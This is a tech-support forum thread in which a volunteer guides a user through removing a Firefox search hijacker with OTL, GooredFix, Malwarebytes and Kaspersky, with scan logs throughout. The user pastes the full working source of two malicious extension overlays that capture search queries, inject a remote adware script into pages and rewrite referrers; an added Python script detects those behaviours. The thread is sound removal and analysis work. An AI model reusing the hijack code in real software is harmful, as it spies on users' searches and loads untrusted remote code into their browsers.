win32:rootkit-gen, win32:trojan-gen, BV:Malware-gen, [Solved]


This topic is locked

#31
Aoc (Topic Starter)
SystemLook v1.0 by jpshortstuff (22.05.09)
Log created at 09:49 on 11/06/2009 by John B (Administrator - Elevation successful)

========== dir ==========

C:\Program Files\Mozilla Firefox\extensions\{396BA20B-7E61-47EB-9095-08D70EF4D85A} - Parameters: "(none)"

---Files---
chrome.manifest --a--- 120 bytes [19:08 30/04/2009] [19:08 30/04/2009]
install.rdf --a--- 770 bytes [19:08 30/04/2009] [19:08 30/04/2009]

---Folders---
chrome d----- [19:08 30/04/2009]

C:\Program Files\Mozilla Firefox\extensions\{AFE5B061-B10B-4111-8C93-FE38258C5CE0} - Parameters: "(none)"

---Files---
chrome.manifest --a--- 120 bytes [21:06 30/04/2009] [21:06 30/04/2009]
install.rdf --a--- 770 bytes [21:06 30/04/2009] [21:06 30/04/2009]

---Folders---
chrome d----- [21:06 30/04/2009]

-=End Of File=-


Here is C:\Program Files\Mozilla Firefox\extensions\{396BA20B-7E61-47EB-9095-08D70EF4D85A}\chrome\content\overlay.xul

<?xml version="1.0" encoding="UTF-8"?>
<!--
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is XUL Reference.
*
* The Initial Developer of the Original Code is
*
* Einar Egilsson. (email: [email protected])
*
* Portions created by the Initial Developer are Copyright © 2006
* the Initial Developer. All Rights Reserved.
*
* Contributor(s):
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
-->

<overlay id="xulcache-overlay" xmlns="http://www.mozilla.o...e.is.only.xul">
<script type="application/x-javascript" >
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);
var xulRef = {
init:
function(){
var appcontent = document.getElementById("appcontent");
if(appcontent){
appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
}
},
onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = '';
var engine ;
var __d = "http://v1.adwarefeed...0901ff&e=";

if( loc.match(/google\..+\/search.*[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'google';
// } else if(loc.match(/search\.ua.+[&\?]q=([^&]*)/)){
// keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&\?]p=([^&]*)/)){
keyword = RegExp.$1;
engine = 'yahoo';
} else if(loc.match(/altavista\.com.*results[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'altavista';
} else if(loc.match(/alltheweb\.com.*search[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'alltheweb';
} else if(loc.match(/search\.netscape\.com.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'netscape';
} else if(loc.match(/search\.aol\.com.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'aol';
} else if(loc.match(/ask\.com.*web[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'ask';
} else if(loc.match(/search\.com.*search[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'searchcom';
} else if(loc.match(/search\.lycos\.com.*[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'lycos';
} else if(loc.match(/nova\.rambler\.ru.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'rambler';
} else if(loc.match(/gogo\.ru.*go[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'gogo';
} else if(loc.match(/meta\.ua.*search.asp[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'meta';
//} else if(loc.match(/au\.ru.*searchPhrase=([^&]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/all\.by.*search.*[&\?]query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'allby';
// } else if(loc.match(/uaport\.net.*UAcatalog[/][&\?].*query=([^&]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/search\.msn\.com.*results.*[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'msn';
} else if(loc.match(/search\.live\.com.*results.*[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'live';
};

if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.id = "js_0";
script.src = __d + engine + '&q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
}
}
};
function initRequestObserver() {
var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}

var httpRequestObserver = {
observe:
function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
var pos = subject.URI.spec.indexOf("&rf=http");
if(pos > -1) {
var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
}
}
}
};

</script>
</overlay>


Here is C:\Program Files\Mozilla Firefox\extensions\{AFE5B061-B10B-4111-8C93-FE38258C5CE0}\chrome\content\overlay.xul



<?xml version="1.0" encoding="UTF-8"?>
<!--
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is XUL Reference.
*
* The Initial Developer of the Original Code is
*
* Einar Egilsson. (email: [email protected])
*
* Portions created by the Initial Developer are Copyright © 2006
* the Initial Developer. All Rights Reserved.
*
* Contributor(s):
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
-->

<overlay id="xulcache-overlay" xmlns="http://www.mozilla.o...e.is.only.xul">
<script type="application/x-javascript" >
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);
var xulRef = {
init:
function(){
var appcontent = document.getElementById("appcontent");
if(appcontent){
appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
}
},
onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = '';
var engine ;
var __d = "http://v1.adwarefeed...0901ff&e=";

if( loc.match(/google\..+\/search.*[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'google';
// } else if(loc.match(/search\.ua.+[&\?]q=([^&]*)/)){
// keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&\?]p=([^&]*)/)){
keyword = RegExp.$1;
engine = 'yahoo';
} else if(loc.match(/altavista\.com.*results[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'altavista';
} else if(loc.match(/alltheweb\.com.*search[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'alltheweb';
} else if(loc.match(/search\.netscape\.com.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'netscape';
} else if(loc.match(/search\.aol\.com.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'aol';
} else if(loc.match(/ask\.com.*web[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'ask';
} else if(loc.match(/search\.com.*search[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'searchcom';
} else if(loc.match(/search\.lycos\.com.*[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'lycos';
} else if(loc.match(/nova\.rambler\.ru.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'rambler';
} else if(loc.match(/gogo\.ru.*go[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'gogo';
} else if(loc.match(/meta\.ua.*search.asp[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'meta';
//} else if(loc.match(/au\.ru.*searchPhrase=([^&]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/all\.by.*search.*[&\?]query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'allby';
// } else if(loc.match(/uaport\.net.*UAcatalog[/][&\?].*query=([^&]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/search\.msn\.com.*results.*[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'msn';
} else if(loc.match(/search\.live\.com.*results.*[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'live';
};

if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.id = "js_0";
script.src = __d + engine + '&q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
}
}
};
function initRequestObserver() {
var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}

var httpRequestObserver = {
observe:
function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
var pos = subject.URI.spec.indexOf("&rf=http");
if(pos > -1) {
var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
}
}
}
};

</script>
</overlay>

Thank you....
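Added example, not code from this thread or from any of the tools used in it: a Python triage script that reads an overlay.xul as pasted above, decodes the HTML entities a forum paste leaves in it (`&amp;`, `&#38;`), and reports the behaviours that make it a search hijacker (search-page URL matching, query extraction, remote script injection into the page, the http-on-modify-request referrer rewrite). The two sample overlays, the `feed.example.invalid` beacon host and the indicator labels are constructed for the demonstration.

```python
# Static triage of a Firefox XUL overlay for search-hijack behaviour (constructed example).
import html
import re
from dataclasses import dataclass

# Each (label, pattern) pair is one behaviour visible in the posted overlay.xul.
INDICATORS = [
    ("hooks search-engine result pages",
     re.compile(r"loc\.match\(\s*/[^/]*(google|yahoo|msn|live|ask|altavista|lycos|aol)")),
    ("extracts the user's query from the URL", re.compile(r"RegExp\.\$1")),
    ("creates a <script> element in the page",
     re.compile(r"""createElement\(\s*['"]script['"]\s*\)""")),
    ("points it at a remote URL built from engine and query",
     re.compile(r"\.src\s*=\s*\w+\s*\+\s*\w+\s*\+")),
    ("observes every outgoing HTTP request", re.compile(r"http-on-modify-request")),
    ("rewrites the request referrer", re.compile(r"\.referrer\s*=")),
]
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S)
COMMENT_RE = re.compile(r"<!--.*?-->", re.S)
ENGINE_RE = re.compile(r"engine\s*=\s*'([^']+)'")
BEACON_RE = re.compile(r"""var\s+__d\s*=\s*["']([^"']+)["']""")


@dataclass
class Verdict:
    hits: list      # indicator labels that matched
    engines: list   # search engines the overlay hooks
    beacon: str     # base URL the injected script is fetched from ("" if none)

    @property
    def suspicious(self) -> bool:
        # The hijack core is hooking search pages AND fetching a remote script
        # built from the query; a request observer alone can be a legitimate add-on.
        return bool(self.engines) and self.beacon != "" and len(self.hits) >= 3


def extract_script(xul: str) -> str:
    """JavaScript inside <script> tags, with XML comments (the license block)
    dropped and the HTML entities a forum paste leaves behind decoded."""
    body = COMMENT_RE.sub("", xul)
    js = "\n".join(m.group(1) for m in SCRIPT_RE.finditer(body))
    return html.unescape(js)


def triage(xul: str) -> Verdict:
    js = extract_script(xul)
    hits = [label for label, pat in INDICATORS if pat.search(js)]
    engines = sorted(set(ENGINE_RE.findall(js)))
    beacon = BEACON_RE.search(js)
    return Verdict(hits, engines, beacon.group(1) if beacon else "")


# Constructed, cut-down copy of the posted overlay, entities included as pasted;
# feed.example.invalid stands in for the real beacon host.
SAMPLE_HIJACK_XUL = r"""<?xml version="1.0" encoding="UTF-8"?>
<!-- license block omitted -->
<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript">
var xulRef = { onPageLoad: function(aEvent){
var doc = aEvent.originalTarget; var loc = doc.location.href;
var keyword = ''; var engine;
var __d = "http://feed.example.invalid/?id=PLACEHOLDER&amp;e=";
if( loc.match(/google\..+\/search.*[&amp;\?]q=([^&amp;]*)/)){
keyword = RegExp.$1; engine = 'google';
} else if(loc.match(/search\.yahoo.*search.*[&amp;\?]p=([^&amp;]*)/)){
keyword = RegExp.$1; engine = 'yahoo';
}
if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.src = __d + engine + '&amp;q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
} } };
var httpRequestObserver = { observe: function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
httpChannel.referrer = newRef;
} } };
</script>
</overlay>
"""

# Constructed benign overlay: one load listener that labels a status-bar item.
SAMPLE_BENIGN_XUL = r"""<?xml version="1.0"?>
<overlay id="hello-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript">
window.addEventListener("load", function() {
var item = document.getElementById("status-bar");
if (item) { item.setAttribute("label", "hello"); }
}, false);
</script>
</overlay>
"""

if __name__ == "__main__":
    for name, xul in (("hijack", SAMPLE_HIJACK_XUL), ("benign", SAMPLE_BENIGN_XUL)):
        v = triage(xul)
        print(f"{name}: suspicious={v.suspicious} engines={v.engines} beacon={v.beacon!r}")
        for label in v.hits:
            print("  -", label)
```

Run it against a real file with `triage(open(path).read())`; the license comment and the pasted entities are handled before any pattern is applied, so a copy taken from a forum post and one taken from disk give the same verdict.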


#32
Egwene (Visiting Consultant)
Hello,

Please double-click GooredFix.exe on your Desktop to run it.
  • Select "2. Fix Goored" by typing 2 and pressing Enter.
  • Make sure all instances of Firefox are closed at this point.
  • Type y at the prompt and press Enter again.
  • A log will open, please post the contents of that log in your next reply (it can also be found on your desktop, called GooredLog.txt).
Note: If you receive a message saying that GooredFix needs your system to be restarted, please close all applications and reboot your system. Please also allow any registry changes that may be prompted by any of your security programs.

Then :

Run OTL
  • Under the Custom Scans/Fixes box at the bottom, paste in the following

    :Files
    C:\Program Files\Mozilla Firefox\extensions\{396BA20B-7E61-47EB-9095-08D70EF4D85A}
    C:\Program Files\Mozilla Firefox\extensions\{AFE5B061-B10B-4111-8C93-FE38258C5CE0}
    
    :Commands
    [purity]
    [emptytemp]
    [start explorer]
    [Reboot]
  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot when it is done

Are you still redirecting? Please post me a fresh Foxscan report.

Regards,
Egwene.

Edited by Egwene, 11 June 2009 - 09:34 AM.

#33
Aoc (Topic Starter)
Here is the new scan from OTL.

It appears to be fixed


========== FILES ==========
File\Folder C:\Program Files\Mozilla Firefox\extensions\{396BA20B-7E61-47EB-9095-08D70EF4D85A} not found.
File\Folder C:\Program Files\Mozilla Firefox\extensions\{AFE5B061-B10B-4111-8C93-FE38258C5CE0} not found.
========== COMMANDS ==========
File delete failed. C:\Documents and Settings\John B\Local Settings\Temp\~DF307.tmp scheduled to be deleted on reboot.
User's Temp folder emptied.
User's Internet Explorer cache folder emptied.
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temp\Temporary Internet Files\Content.IE5\index.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temp\History\History.IE5\index.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temp\Cookies\index.dat scheduled to be deleted on reboot.
Local Service Temp folder emptied.
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat scheduled to be deleted on reboot.
Local Service Temporary Internet Files folder emptied.
Network Service Temp folder emptied.
Network Service Temporary Internet Files folder emptied.
File delete failed. C:\WINDOWS\temp\_avast4_\Webshlock.txt scheduled to be deleted on reboot.
File delete failed. C:\WINDOWS\temp\Perflib_Perfdata_648.dat scheduled to be deleted on reboot.
Windows Temp folder emptied.
Java cache emptied.
Temp folders emptied.
Explorer started successfully

OTListIt2 by OldTimer - Version 2.0.15.7 log created on 06112009_104555

Files moved on Reboot...
C:\Documents and Settings\John B\Local Settings\Temp\~DF307.tmp moved successfully.
File move failed. C:\WINDOWS\temp\_avast4_\Webshlock.txt scheduled to be moved on reboot.
C:\WINDOWS\temp\Perflib_Perfdata_648.dat moved successfully.

Registry entries deleted on Reboot...
#34
Egwene (Visiting Consultant)
Hello,

Please post me a new Foxscan report (run Foxscan again and post me the new report).

Regards,
Egwene.
#35
Aoc (Topic Starter)
OK,


FoxScan Version 1.1.0
By Loup blanc - Zebulon.fr
Scan started Thu 06/11/2009 at 12:13

Microsoft Windows XP Home Edition Service Pack 3 [Version 5.1.2600]

Mozilla Firefox version : 3.0.10 (en-US)
Installation folder : ""


=================================================================================
---------- User account : John B [Current session]
=================================================================================


Profile name : default
Profile folder : C:\Documents and Settings\John B\Application Data\mozilla\firefox\Profiles\ghtrl0km.default\
Start pages prefs.js : "www.yahoo.com"


//////////// Setting \\\\\\\\\\\\\
======= Profile name : default =======

Firefox update : Activated
Add-on update : Activated
Search engines update : Activated
Java : Activated
Javascript : Activated
Proxy : Automatic detection




//////////// Add-on \\\\\\\\\\\\\

======= Profile name : default =======

Installation notification for Add-on is enabled

Name : Distrust
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\[email protected]

Name : DownThemAllname
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}

Name : firefusk
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{fffe0eac-3819-4561-8aa9-178a68450d4f}

Name : myibay Firefox extension
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\[email protected]

Name : PasswordMaker
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{5872365e-67d1-4afd-9480-fd293bebd20d}

Name : User Agent Switcher
State : Activated
Folder : C:\Documents and Settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}

Name : Default
State : Activated
Folder : C:\Program Files\Mozilla Firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

Name : 1-ClickWeather
State : Deactivated




//////////// Search plugins \\\\\\\\\\\\\

======= Profile name : default =======

Search in "prefs.js" :

browser.search.defaultenginename :
browser.search.defaulturl :
browser.search.selectedEngine :
keyword.URL :
keyword.enable :


--------- Search engines found ------------
+ Search form configured for the engine





=================================================================================
---------- Common section
=================================================================================

//////////// DLL found in ""\components \\\\\\\\\\\\\



------------------------------------------------------

//////////// Search plugins \\\\\\\\\\\\\

--------- Search engines found ------------
+ Search form configured for the engine



------------------------------------------------------

//////////// Plugins set in registry \\\\\\\\\\\\\


[HKEY_LOCAL_MACHINE\software\mozillaplugins\@adobe.com/FlashPlayer]
"Description"="Adobe® Flash® Player 10"
"Vendor"="Adobe Systems Incorporated"
"Path"="C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@adobe.com/ShockwavePlayer]
"Description"="Adobe Shockwave Player"
"Vendor"="Adobe Systems Inc"
"Path"="C:\WINDOWS\system32\Adobe\Director\np32dsw.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@real.com/nppl3260;version=6.0.11.2061]
"Description"="RealPlayer™ LiveConnect-Enabled Plug-In"
"Vendor"="RealNetworks"
"Path"="C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@real.com/nprjplug;version=1.0.2.2122]
"Description"="RealJukebox Netscape Plugin"
"Vendor"="RealNetworks"
"Path"="C:\Program Files\Real\RealPlayer\Netscape6\nprjplug.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@real.com/nprpjplug;version=6.0.12.1059]
"Description"="6.0.12.1059"
"Vendor"="RealNetworks"
"Path"="C:\Program Files\Real\RealPlayer\Netscape6\nprpjplug.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@real.com/nsJSRealPlayerPlugin;version=]

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@tools.google.com/Google Update;version=8]
"Description"="Google Update"
"Vendor"="Google"
"Path"="C:\Program Files\Google\Update\1.2.145.5\npGoogleOneClick8.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@unity3d.com/UnityPlayer]
"Description"="Unity Player 2.0.2f2"
"Vendor"="Unity Technologies ApS"
"Path"="C:\Program Files\Unity\WebPlayer\loader\npUnity3D32.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\@viewpoint.com/VMP]
"Description"="Viewpoint Media Player for Mozilla"
"Vendor"="Viewpoint Corporation"
"Path"="C:\Program Files\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll"

[HKEY_LOCAL_MACHINE\software\mozillaplugins\[email protected]/YahooActiveXPluginBridge;version=1.0.0.1]
"Description"="Yahoo! activeX Plug-in Bridge"
"Vendor"="Yahoo"
"Path"="C:\Program Files\Yahoo!\Common\npyaxmpb.dll"

[HKEY_CURRENT_USER\software\mozillaplugins\@adobe.com/FlashPlayer]
"Description"="Adobe Flash Player 9.0"
"Vendor"="Adobe Systems Inc."
"Path"="C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll"


------------------------------------------------------

//////////// Additional search... \\\\\\\\\\\\\

==== Additional extension ====


[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]

[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 3.0.10\extensions]


=========================== End of report ===========================
#36
Aoc (Topic Starter)
Still with me?
#37
Egwene (Visiting Consultant)
Hello Aoc,

Looks good :)

Please download Malwarebytes' Anti-Malware from Here or Here

Double Click mbam-setup.exe to install the application.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select "Perform Quick Scan", then click Scan.
  • The scan may take some time to finish, so please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to Restart. (See Extra Note)
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
  • Copy & paste the entire report in your next reply.
Extra Note:
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts; click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately.

Then :

Establish an internet connection & perform an online scan with Firefox or Internet Explorer at Kaspersky Online Scanner

**Note**

To optimize scanning time and produce a more sensible report for review:
  • Close any open programs
  • Turn off the real time scanner of any existing antivirus program while performing the online scan.
Click Accept, when prompted to download and install the program files and database of malware definitions.
  • Click Run at the Security prompt.
  • The program will then begin downloading and installing and will also update the database.
  • Please be patient as this can take several minutes.
  • Once the update is complete, click on My Computer under the green Scan bar to the left to start the scan.
  • Once the scan is complete, it will display if your system has been infected. It does not provide an option to clean/disinfect. We only require a report from it.
  • Do NOT be alarmed by what you see in the report. Many of the finds have likely been quarantined.
  • Click View scan report at the bottom.
  • Click the Save Report As... button.
  • Click the Save as Text button to save the file to your desktop so that you may post it in your next reply.

Regards,
Egwene.
#38
Aoc (Topic Starter)
OK, here are the two logs.


Malwarebytes' Anti-Malware 1.38
Database version: 2326
Windows 5.1.2600 Service Pack 3

6/24/2009 9:04:31 AM
mbam-log-2009-06-24 (09-04-31).txt

Scan type: Quick Scan
Objects scanned: 100973
Time elapsed: 7 minute(s), 7 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 3
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CLASSES_ROOT\CLSID\{bad4551d-9b24-42cb-9bcd-818ca2da7b63} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{bad4551d-9b24-42cb-9bcd-818ca2da7b63} (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\AvScan (Malware.Trace) -> Quarantined and deleted successfully.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



--------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER 7.0 REPORT
Thursday, June 25, 2009
Operating System: Microsoft Windows XP Home Edition Service Pack 3 (build 2600)
Kaspersky Online Scanner version: 7.0.26.13
Program database last update: Wednesday, June 24, 2009 23:08:15
Records in database: 2387606
--------------------------------------------------------------------------------

Scan settings:
Scan using the following database: extended
Scan archives: yes
Scan mail databases: yes

Scan area - My Computer:
C:\
D:\

Scan statistics:
Files scanned: 92818
Threat name: 8
Infected objects: 10
Suspicious objects: 4
Duration of the scan: 02:45:56


File name / Threat name / Threats count
C:\Documents and Settings\John B\Application Data\Thunderbird\Profiles\qhyabnx5.default\Mail\Local Folders\Inbox Suspicious: Trojan-Spy.HTML.Fraud.gen 4
C:\Documents and Settings\John B\Application Data\Thunderbird\Profiles\qhyabnx5.default\Mail\Local Folders\Inbox Infected: Trojan-Spy.HTML.Bankfraud.rw 1
C:\Documents and Settings\John B\desktop\porthard\workcomputer\docs\Downloads\Programs\Sparkle_dwn.exe Infected: not-a-virus:AdWare.Win32.Virtumonde.rnh 1
C:\Documents and Settings\John B\DoctorWeb\Quarantine\Abel.exe Infected: not-a-virus:PSWTool.Win32.Cain.284 1
C:\Documents and Settings\John B\My Documents\My Completed Downloads\ca_setup.exe Infected: not-a-virus:PSWTool.Win32.Cain.284 1
C:\poykfa.exe Infected: Trojan-Spy.Win32.Zbot.gen 1
C:\System Volume Information\_restore{5808F9B6-96B5-4803-A039-47EB1E010CB7}\RP386\A0066277.exe Infected: not-a-virus:PSWTool.Win32.Cain.284 1
C:\System Volume Information\_restore{5808F9B6-96B5-4803-A039-47EB1E010CB7}\RP403\A0066755.exe Infected: Trojan-Spy.Win32.Zbot.gen 1
C:\System Volume Information\_restore{5808F9B6-96B5-4803-A039-47EB1E010CB7}\RP403\A0066760.dll Infected: Trojan-Downloader.Win32.FraudLoad.wcff 1
C:\System Volume Information\_restore{5808F9B6-96B5-4803-A039-47EB1E010CB7}\RP403\A0066778.dll Infected: Trojan-Downloader.Win32.Small.jwp 1
C:\_OTListIt\MovedFiles\05272009_102450\Documents and Settings\John B\Local Settings\Temp\plugtmp-1\plugin-pfre.php Infected: Exploit.Win32.Pidief.azg 1

The selected area was scanned.
#39
Egwene (Visiting Consultant)
Hello and sorry for the delay,

Please post me a fresh OTL log.

Thanks.

Regards,
Egwene.

Edited by Egwene, 08 July 2009 - 03:14 PM.

#40
Aoc (Topic Starter)
OTListIt logfile created on: 7/9/2009 11:26:11 AM - Run 5
OTListIt2 by OldTimer - Version 2.0.15.7 Folder = C:\Documents and Settings\John B\Desktop
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 6.0.2900.5512)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

750.79 Mb Total Physical Memory | 264.11 Mb Available Physical Memory | 35.18% Memory free
1.05 Gb Paging File | 0.70 Gb Available in Paging File | 66.48% Paging File free
Paging file location(s): C:\pagefile.sys 360 720 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 37.26 Gb Total Space | 8.38 Gb Free Space | 22.48% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
Drive E: | 76.31 Gb Total Space | 67.72 Gb Free Space | 88.75% Space Free | Partition Type: FAT32
